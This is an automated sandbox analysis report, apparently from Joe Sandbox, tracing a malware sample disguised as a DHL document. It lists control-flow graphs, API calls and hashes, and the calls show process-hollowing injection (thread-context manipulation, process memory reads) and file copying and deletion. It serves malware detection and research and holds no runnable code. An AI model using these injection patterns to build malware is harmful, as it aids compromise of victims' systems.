                                                                                      control_flow_graph 1188 feefa8-fef11f call fecbf8 call feee98 CreateFileW 1195 fef126-fef136 1188->1195 1196 fef121 1188->1196 1199 fef13d-fef157 VirtualAlloc 1195->1199 1200 fef138 1195->1200 1197 fef1d6-fef1db 1196->1197 1201 fef15b-fef172 ReadFile 1199->1201 1202 fef159 1199->1202 1200->1197 1203 fef176-fef1b0 call feeed8 call fede98 1201->1203 1204 fef174 1201->1204 1202->1197 1209 fef1cc-fef1d4 ExitProcess 1203->1209 1210 fef1b2-fef1c7 call feef28 1203->1210 1204->1197 1209->1197 1210->1209
                                                                                      APIs
                                                                                        • Part of subcall function 00FEEE98: Sleep.KERNELBASE(000001F4), ref: 00FEEEA9
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00FEF112
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1751009954.0000000000FEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FEC000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_fec000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileSleep
                                                                                      • String ID: KWJ2F70Z3HI8QLD2VALAQAN
                                                                                      • API String ID: 2694422964-2491927390
                                                                                      • Opcode ID: ee74e56cfecbde7399d0f31202bfd9ad9b6218c9f6153e2f531cec6e0efe5c4b
                                                                                      • Instruction ID: 7ed7cdc3fbaf04389adf839119cccaf64883703035fd1e514dc51eb048e2be82
                                                                                      • Opcode Fuzzy Hash: ee74e56cfecbde7399d0f31202bfd9ad9b6218c9f6153e2f531cec6e0efe5c4b
                                                                                      • Instruction Fuzzy Hash: 0161A531D0428CDAEF11DBE4D844BEEBB75AF19304F044199E648BB2C1D7BA0B45CBA6

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1212 e12947-e129b9 call de1f50 call e125d6 call dbfe0b call da5722 call e1274e call da511f call dc5232 1227 e12a6c-e12a73 call e12e66 1212->1227 1228 e129bf-e129c6 call e12e66 1212->1228 1233 e12a75-e12a77 1227->1233 1234 e12a7c 1227->1234 1228->1233 1235 e129cc-e12a6a call dcd583 call dc4983 call dc9038 call dcd583 call dc9038 * 2 1228->1235 1236 e12cb6-e12cb7 1233->1236 1238 e12a7f-e12b3a call da50f5 * 8 call e13017 call dce5eb 1234->1238 1235->1238 1239 e12cd5-e12cdb 1236->1239 1277 e12b43-e12b5e call e12792 1238->1277 1278 e12b3c-e12b3e 1238->1278 1242 e12cf0-e12cf6 1239->1242 1243 e12cdd-e12ced call dbfdcd call dbfe14 1239->1243 1243->1242 1281 e12bf0-e12bfc call dce678 1277->1281 1282 e12b64-e12b6c 1277->1282 1278->1236 1289 e12c12-e12c16 1281->1289 1290 e12bfe-e12c0d DeleteFileW 1281->1290 1283 e12b74 1282->1283 1284 e12b6e-e12b72 1282->1284 1286 e12b79-e12b97 call da50f5 1283->1286 1284->1286 1296 e12bc1-e12bd7 call e1211d call dcdbb3 1286->1296 1297 e12b99-e12b9e 1286->1297 1292 e12c91-e12ca5 CopyFileW 1289->1292 1293 e12c18-e12c7e call e125d6 call dcd2eb * 2 call e122ce 1289->1293 1290->1236 1294 e12ca7-e12cb4 DeleteFileW 1292->1294 1295 e12cb9-e12ccf DeleteFileW call e12fd8 1292->1295 1293->1295 1317 e12c80-e12c8f DeleteFileW 1293->1317 1294->1236 1303 e12cd4 1295->1303 1310 e12bdc-e12be7 1296->1310 1300 e12ba1-e12bb4 call e128d2 1297->1300 1311 e12bb6-e12bbf 1300->1311 1303->1239 1310->1282 1313 e12bed 1310->1313 1311->1296 1313->1281 1317->1236
                                                                                      APIs
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E12C05
                                                                                      • DeleteFileW.KERNEL32(?), ref: 00E12C87
                                                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E12C9D
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E12CAE
                                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E12CC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Delete$Copy
                                                                                      • String ID:
                                                                                      • API String ID: 3226157194-0
                                                                                      • Opcode ID: 5469d3ecf6a96ad01b463186f9a47a7647eaa235969790775baf46ef04ae2e4b
                                                                                      • Instruction ID: ac3dd63d5f7259a97abeddd9f55b2da833fa2d46b4939b02c5f35400854ef517
                                                                                      • Opcode Fuzzy Hash: 5469d3ecf6a96ad01b463186f9a47a7647eaa235969790775baf46ef04ae2e4b
                                                                                      • Instruction Fuzzy Hash: 15B16D71900119ABDF21DBA4CC85EDEBBBDEF09350F1040AAF609F7151EA309A948FB1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1354 da3b1c-da3b27 1355 da3b99-da3b9b 1354->1355 1356 da3b29-da3b2e 1354->1356 1358 da3b8c-da3b8f 1355->1358 1356->1355 1357 da3b30-da3b48 RegOpenKeyExW 1356->1357 1357->1355 1359 da3b4a-da3b69 RegQueryValueExW 1357->1359 1360 da3b6b-da3b76 1359->1360 1361 da3b80-da3b8b RegCloseKey 1359->1361 1362 da3b78-da3b7a 1360->1362 1363 da3b90-da3b97 1360->1363 1361->1358 1364 da3b7e 1362->1364 1363->1364 1364->1361
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00DA3B0F,SwapMouseButtons,00000004,?), ref: 00DA3B40
                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00DA3B0F,SwapMouseButtons,00000004,?), ref: 00DA3B61
                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00DA3B0F,SwapMouseButtons,00000004,?), ref: 00DA3B83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Control Panel\Mouse
                                                                                      • API String ID: 3677997916-824357125
                                                                                      • Opcode ID: 2dc29d3c8758376bd5bfbf53e2ca436278dc20c663c0507e1b0914a252995f79
                                                                                      • Instruction ID: 4a719a52d7525dfe41607599b5e58eb2639199d85ae07fdae19a735197968795
                                                                                      • Opcode Fuzzy Hash: 2dc29d3c8758376bd5bfbf53e2ca436278dc20c663c0507e1b0914a252995f79
                                                                                      • Instruction Fuzzy Hash: 4A112AB5511208FFDB208FA5DC89AAEBBBAEF05744B144459B805E7110D331DE449B70

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1365 fede98-fedf38 call ff0368 * 3 1372 fedf4f 1365->1372 1373 fedf3a-fedf44 1365->1373 1375 fedf56-fedf5f 1372->1375 1373->1372 1374 fedf46-fedf4d 1373->1374 1374->1375 1376 fedf66-fee618 1375->1376 1377 fee61a-fee61e 1376->1377 1378 fee62b-fee658 CreateProcessW 1376->1378 1379 fee664-fee691 1377->1379 1380 fee620-fee624 1377->1380 1385 fee65a-fee65d 1378->1385 1386 fee662 1378->1386 1401 fee69b 1379->1401 1402 fee693-fee696 1379->1402 1382 fee69d-fee6ca 1380->1382 1383 fee626 1380->1383 1384 fee6d4-fee6ee Wow64GetThreadContext 1382->1384 1403 fee6cc-fee6cf 1382->1403 1383->1384 1388 fee6f5-fee710 ReadProcessMemory 1384->1388 1389 fee6f0 1384->1389 1390 feea59-feea5b 1385->1390 1386->1384 1393 fee717-fee720 1388->1393 1394 fee712 1388->1394 1392 feea02-feea06 1389->1392 1399 feea08-feea0c 1392->1399 1400 feea57 1392->1400 1397 fee749-fee768 call fef9e8 1393->1397 1398 fee722-fee731 1393->1398 1394->1392 1416 fee76f-fee792 call fefb28 1397->1416 1417 fee76a 1397->1417 1398->1397 1404 fee733-fee742 call fef938 1398->1404 1405 feea0e-feea1a 1399->1405 1406 feea21-feea25 1399->1406 1400->1390 1401->1384 1402->1390 1403->1390 1404->1397 1421 fee744 1404->1421 1405->1406 1408 feea27-feea2a 1406->1408 1409 feea31-feea35 1406->1409 1408->1409 1412 feea37-feea3a 1409->1412 1413 feea41-feea45 1409->1413 1412->1413 1419 feea47-feea4d call fef938 1413->1419 1420 feea52-feea55 1413->1420 1424 fee7dc-fee7fd call fefb28 1416->1424 1425 fee794-fee79b 1416->1425 1417->1392 1419->1420 1420->1390 1421->1392 1432 fee7ff 1424->1432 1433 fee804-fee822 call ff0388 1424->1433 1426 fee79d-fee7ce call fefb28 1425->1426 1427 fee7d7 1425->1427 1434 fee7d5 1426->1434 1435 fee7d0 1426->1435 1427->1392 1432->1392 1438 fee82d-fee837 1433->1438 1434->1424 1435->1392 1439 fee86d-fee871 1438->1439 1440 fee839-fee86b call ff0388 1438->1440 1442 fee95c-fee979 call fef538 1439->1442 1443 fee877-fee887 1439->1443 1440->1438 1450 fee97b 1442->1450 1451 fee980-fee99f Wow64SetThreadContext 1442->1451 1443->1442 1446 fee88d-fee89d 1443->1446 1446->1442 1449 fee8a3-fee8c7 1446->1449 1452 fee8ca-fee8ce 1449->1452 1450->1392 1453 fee9a3-fee9ae call fef868 1451->1453 1454 fee9a1 1451->1454 1452->1442 1455 fee8d4-fee8e9 1452->1455 1461 fee9b2-fee9b6 1453->1461 1462 fee9b0 1453->1462 1454->1392 1457 fee8fd-fee901 1455->1457 1459 fee93f-fee957 1457->1459 1460 fee903-fee90f 1457->1460 1459->1452 1463 fee93d 1460->1463 1464 fee911-fee93b 1460->1464 1466 fee9b8-fee9bb 1461->1466 1467 fee9c2-fee9c6 1461->1467 1462->1392 1463->1457 1464->1463 1466->1467 1468 fee9c8-fee9cb 1467->1468 1469 fee9d2-fee9d6 1467->1469 1468->1469 1470 fee9d8-fee9db 1469->1470 1471 fee9e2-fee9e6 1469->1471 1470->1471 1472 fee9e8-fee9ee call fef938 1471->1472 1473 fee9f3-fee9fc 1471->1473 1472->1473 1473->1376 1473->1392
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 00FEE653
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FEE6E9
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FEE70B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1751009954.0000000000FEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FEC000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_fec000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                                                      • Instruction ID: 1da9764e6fa6fcca21bdd951542a92573cfe76331fb33bf1387561b81568d7a5
                                                                                      • Opcode Fuzzy Hash: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                                                      • Instruction Fuzzy Hash: FA621930A142589BEB24CBA4D841BDEB372FF58300F1091A9E10DEB391E7799E85DB59
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DE33A2
                                                                                        • Part of subcall function 00DA6B57: _wcslen.LIBCMT ref: 00DA6B6A
                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DA3A04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                                      • String ID: Line:
                                                                                      • API String ID: 2289894680-1585850449
                                                                                      • Opcode ID: 12ba793daf1e342df321d89a36ba141d378c43f99fcf9e113bd7ba6e211d92c6
                                                                                      • Instruction ID: e793997d16ef32db6905c64c05e671124d0e067e5b6df8bb3e5242c16c4e4258
                                                                                      • Opcode Fuzzy Hash: 12ba793daf1e342df321d89a36ba141d378c43f99fcf9e113bd7ba6e211d92c6
                                                                                      • Instruction Fuzzy Hash: 2131B071408304AEC721EB24DC46BEBB7E8EB42710F14456AF599A3091EB70D648CBF2
                                                                                      APIs
                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00DE2C8C
                                                                                        • Part of subcall function 00DA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA3A97,?,?,00DA2E7F,?,?,?,00000000), ref: 00DA3AC2
                                                                                        • Part of subcall function 00DA2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DA2DC4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                      • String ID: X$`e
                                                                                      • API String ID: 779396738-4036142377
                                                                                      • Opcode ID: 9abc5bc2b02a04ecffd15f060087f684eb904ea0ebe61bbd975107eeaeb27763
                                                                                      • Instruction ID: c92d88d6264d9181c6f7f4bd3dc11562430fea2275c37658a772aa4f91b81e14
                                                                                      • Opcode Fuzzy Hash: 9abc5bc2b02a04ecffd15f060087f684eb904ea0ebe61bbd975107eeaeb27763
                                                                                      • Instruction Fuzzy Hash: B821C371A10298AFCB01EF99D805BEE7BFCEF49304F004059E405B7241DBB89A898FB1
                                                                                      APIs
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00DC0668
                                                                                        • Part of subcall function 00DC32A4: RaiseException.KERNEL32(?,?,?,00DC068A,?,00E71444,?,?,?,?,?,?,00DC068A,00DA1129,00E68738,00DA1129), ref: 00DC3304
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00DC0685
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                      • String ID: Unknown exception
                                                                                      • API String ID: 3476068407-410509341
                                                                                      • Opcode ID: 0d9c241bf9287088afc8c2b8d8b179576988a7c4e297b870fbea21ae21fe6091
                                                                                      • Instruction ID: 9355e8d46c4b3e53020c0ee8ea331e815b8333f2b329eebe262dcb7a5dd6fdfe
                                                                                      • Opcode Fuzzy Hash: 0d9c241bf9287088afc8c2b8d8b179576988a7c4e297b870fbea21ae21fe6091
                                                                                      • Instruction Fuzzy Hash: D4F0683494030EF78F00BA64EC4AE9D7F6C9E40350BA44539B915D7591EF71DA66C5B0
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00E1302F
                                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E13044
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Temp$FileNamePath
                                                                                      • String ID: aut
                                                                                      • API String ID: 3285503233-3010740371
                                                                                      • Opcode ID: ec3917a66204800e552ef4f75e3c07d85544d0aa02d964b581870500b24b171d
                                                                                      • Instruction ID: 7b875d61adbf5628db2b0b0874f6855cc108017be3fefb01b4a772d3057b5a28
                                                                                      • Opcode Fuzzy Hash: ec3917a66204800e552ef4f75e3c07d85544d0aa02d964b581870500b24b171d
                                                                                      • Instruction Fuzzy Hash: DFD05B72540318ABDA209795AC0DFC73E6CD704750F0002517655F20A1DAB0D544CBD0
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00E282F5
                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00E282FC
                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00E284DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 146820519-0
                                                                                      • Opcode ID: 5a4c07355fc7688d2e1ffdc643c1f185158ad28ad574af6d1290912212917aaa
                                                                                      • Instruction ID: 8d847f49d2a04921492e55f89409a8b5af09db7373f380e1cb9875420b7bded8
                                                                                      • Opcode Fuzzy Hash: 5a4c07355fc7688d2e1ffdc643c1f185158ad28ad574af6d1290912212917aaa
                                                                                      • Instruction Fuzzy Hash: BB128A71A08311CFD714DF28C584B6ABBE1FF89318F04995DE8999B292CB30ED45CB92
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63a306c5e701c40c4d8f7d31f13edb3fead19524063b771d4779d3e73b5c5518
                                                                                      • Instruction ID: da6e67cad21067e5cd789aabd1f494192dfdd040ca19708d94ef9eadbfcd02c7
                                                                                      • Opcode Fuzzy Hash: 63a306c5e701c40c4d8f7d31f13edb3fead19524063b771d4779d3e73b5c5518
                                                                                      • Instruction Fuzzy Hash: 3551BD71A1060AAFDB20AFA9E845FEEBFB9EF05310F18005BF405A7395D6719A01DB71
                                                                                      APIs
                                                                                        • Part of subcall function 00DA1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DA1BF4
                                                                                        • Part of subcall function 00DA1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DA1BFC
                                                                                        • Part of subcall function 00DA1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DA1C07
                                                                                        • Part of subcall function 00DA1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DA1C12
                                                                                        • Part of subcall function 00DA1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DA1C1A
                                                                                        • Part of subcall function 00DA1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DA1C22
                                                                                        • Part of subcall function 00DA1B4A: RegisterWindowMessageW.USER32(00000004,?,00DA12C4), ref: 00DA1BA2
                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DA136A
                                                                                      • OleInitialize.OLE32 ref: 00DA1388
                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00DE24AB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1986988660-0
                                                                                      • Opcode ID: 5b8879ad615a9dea40387c325567e033380b7c19120e3ddce9936c6832c58905
                                                                                      • Instruction ID: f59fda6d4cadca1abb867c047f889c16ef543b0b7d99885aef838628d2e503ed
                                                                                      • Opcode Fuzzy Hash: 5b8879ad615a9dea40387c325567e033380b7c19120e3ddce9936c6832c58905
                                                                                      • Instruction Fuzzy Hash: DB71AEB49113408FD388DF7FA8466553AE5FBC934475592AED01EF7261EB308489CF62
                                                                                      APIs
                                                                                        • Part of subcall function 00DA3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DA3A04
                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E0C259
                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00E0C261
                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E0C270
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_Timer$Kill
                                                                                      • String ID:
                                                                                      • API String ID: 3500052701-0
                                                                                      • Opcode ID: 41b42175ee7a8b8c4fe6f9eb35693ef3130612821c10afd6057f006cc54b73d8
                                                                                      • Instruction ID: 0023ddd8725de03d248e11e864417f4d70a186c92f86623616f84d0585123723
                                                                                      • Opcode Fuzzy Hash: 41b42175ee7a8b8c4fe6f9eb35693ef3130612821c10afd6057f006cc54b73d8
                                                                                      • Instruction Fuzzy Hash: 6D31B470904744AFEB228B648855BEBBBEC9B06308F10149EE5DEB3291C7745AC8CB51
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,00DD85CC,?,00E68CC8,0000000C), ref: 00DD8704
                                                                                      • GetLastError.KERNEL32(?,00DD85CC,?,00E68CC8,0000000C), ref: 00DD870E
                                                                                      • __dosmaperr.LIBCMT ref: 00DD8739
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
